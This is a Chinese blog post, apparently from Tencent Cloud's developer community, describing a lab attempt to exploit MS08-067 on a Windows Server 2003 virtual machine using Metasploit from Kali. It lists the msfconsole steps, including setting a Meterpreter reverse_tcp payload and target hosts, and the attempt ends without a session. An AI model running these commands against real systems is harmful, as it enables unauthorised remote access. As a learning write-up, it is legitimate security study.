首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Metasploit渗透复现MS08-067漏洞

Metasploit渗透复现MS08-067漏洞

原创
作者头像
用砖头敲代码
发布2022-06-14 16:02:32
发布2022-06-14 16:02:32
9000
举报
文章被收录于专栏:用砖头敲代码用砖头敲代码

本文说明

这篇文章也是我在别的博客看到的,一想自己的Kali已经尘封多年了,所以便有了想试试的冲动,但是本次测试并没有成功,没有成功的原因可能是漏洞已经被填了,也有可能是我操作的过程不对。

还有最最最重要的一条,本次测试是在绝对安全的环境下(由虚拟机构建的局域网环境)完成测试的。这不是教程啊,可掰(别)跟着瞎xiao(学)啊

试验环境

  • 虚拟局域网,网关:192.168.101.1
  • Kali Linux 2020.01,ip:192.168.101.255
  • Windows Server 2003,ip:192.168.101.229

实验过程

1.先获取自己的ip地址

代码语言:txt
复制
kali@kali:~$ sudo ifconfig
sudo ifconfig
sudo ifconfig
代码语言:txt
复制
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>ipconfig
ipconfig
ipconfig

2.获取到了以后我们互相ping一下,确认是否可以ping通

代码语言:txt
复制
kali@kali:~$ sudo ping 192.168.101.229
sudo ping 192.168.101.229
sudo ping 192.168.101.229
代码语言:txt
复制
ping 192.168.101.255
ping 192.168.101.255
ping 192.168.101.255

3.ok,都已经ping通了,我们初始化一下数据库

代码语言:txt
复制
kali@kali:~$ sudo service postgresql start
kali@kali:~$ sudo msfdb init
初始化数据库
初始化数据库

4.接下来我们进入msf的终端

代码语言:txt
复制
kali@kali:~$ sudo msfconsole
sudo msfconsole
sudo msfconsole

5.进去了之后我们搜索一下MS08-067模块

代码语言:txt
复制
msf5 > search ms08-067
search ms08-067
search ms08-067

6.搜索到了,我们看一下序号,然后使用它

代码语言:txt
复制
msf5 > use 0
use 0
use 0

7.好了,已经使用了,我们列出一下它的载荷

代码语言:txt
复制
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads
设置相关信息
设置相关信息

8.我们来设置一下我们要使用的载荷,然后设置相关信息

代码语言:txt
复制
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.101.229
rhost => 192.168.101.229
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.101.255
lhost => 192.168.101.255
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf5 exploit(windows/smb/ms08_067_netapi) > show options
使用载荷
使用载荷

9.既然都设置好了,那么我们就可以开始攻击了。

代码语言:txt
复制
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
开始攻击
开始攻击

实验结果

然后我们来看看结果,这里的话我们可以看出no session was created这就证明我们这次攻击是不成功的。虽然说有些小失落,但是更多的开心。我的这个Windows Server 2003镜像是在网络下载的,可以看出来这个镜像的相关漏洞已经被修复了,倘若没有修复漏洞的话,那么这个镜像流入市场,会带来多大的损失我们可想而知。

代码语言:txt
复制
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.101.255:4444 
[*] 192.168.101.229:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 本文说明
  • 试验环境
  • 实验过程
  • 实验结果
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档